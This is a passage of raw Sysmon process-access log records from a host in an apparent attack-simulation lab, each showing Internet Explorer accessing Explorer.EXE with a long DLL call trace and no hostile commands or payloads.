w64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c6173(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5650(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+204f32(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5314(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64) 10341000x800000000000000013546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c6173(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5650(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+204f32(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5314(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64) 10341000x800000000000000013545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c6173(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5650(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+204f32(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5314(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64) 10341000x800000000000000013544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c6173(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5650(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+204f32(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5314(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5650(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+204f32(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5314(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64) 10341000x800000000000000013542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
